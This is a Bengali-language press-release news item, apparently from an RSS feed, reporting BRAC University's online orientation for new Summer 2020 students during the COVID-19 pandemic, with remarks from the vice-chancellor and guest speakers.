ব্র্যাক ইউনিভার্সিটি : অনলাইন ওরিয়েন্টেশন অনুষ্ঠিত https://www.dhakaskynews.com/education/2020/07/15/News_ID-788/ https://www.dhakaskynews.com/education/2020/07/15/News_ID-788/#respond Tue, 14 Jul 2020 19:23:51 +0000 https://www.dhakaskynews.com/?p=788 ব্র্যাক ইউনিভার্সিটি সামার-২০২০ সেমিস্টারের নবীন শিক্ষার্থীদের আনুষ্ঠানিকভাবে বরণ করেছে। কভিড-১৯ মহামারির কারণে গত শনিবার নতুন সেমিস্টারে ভর্তি শিক্ষার্থীদের অনলাইন ওরিয়েন্টেশন আয়োজন করে বিশ্ববিদ্যালয় কর্তৃপক্ষ।

সকাল ৯টায় এই অনুষ্ঠান শুরু হয়। সূচনা সঙ্গীতের পর ব্র্যাকের প্রতিষ্ঠাতা স্যার ফজলে হাসান আবেদ, কেসিএমজি এর জীবনের বিভিন্ন দিক ও অর্জন নিয়ে বিশেষ প্রামাণ্যচিত্র প্রদর্শিত হয়।

সূচনা বক্তব্য দেন বিশ্ববিদ্যালয়ের প্রক্টর আবদুল্লাহ রুবায়েত চৌধুরী। ব্র্যাক ইউনিভার্সিটির বিভিন্ন বিভাগ, অফিস সম্পর্কে ধারণা ও শিক্ষার্থীদের করণীয় বিষয়ে দিক নির্দেশনামূলক বক্তব্য দেন তিনি। সকাল ১০টায় শিক্ষার্থীদের বরণ করে নেন বিশ্ববিদ্যালয়ের উপাচার্য প্রফেসর ভিনসেন্ট চ্যাং, পিএইচডি।

তিনি বলেন, ‘বর্তমান অবস্থায় অনেক শিক্ষার্থীর জন্য পড়াশোনা শুরু করাটা কঠিন হবে। ব্র্যাক ইউনিভার্সিটির অনলাইন লার্নিং প্লাটফর্ম ‘বিউএক্স’ এবং স্টুডেন্টস অ্যাসিসটেন্ট ফান্ডের সদ্ব্যবহারের মাধ্যমে অত্যন্ত সূচারুরূপে দূরবর্তী শিক্ষণ অভিজ্ঞতা লাভ করা যাবে বলে আমরা আশা করছি।’

ব্র্যাক ইউনিভার্সিটিতে পড়ার অভিজ্ঞতা ও প্রাপ্তি তুলে ধরেন অনুষ্ঠানের বিশেষ অতিথি জনপ্রিয় গায়িকা ও অভিনয়শিল্পী সামিহা নুসরাত ও রাফিয়াথ রশীদ মিথিলা। সামাজিক মাধ্যম ফেসবুকে হ্যাশট্যাগ উইআরব্র্যাকইউ ২০২০ ডুডল পোস্টকার্ড শেয়ার করার মধ্য দিয়ে শেষ হয় ওরিয়েন্টেশন অনুষ্ঠানটি। সংবাদ বিজ্ঞপ্তি।

]]>
https://www.dhakaskynews.com/education/2020/07/15/News_ID-788/feed/ 0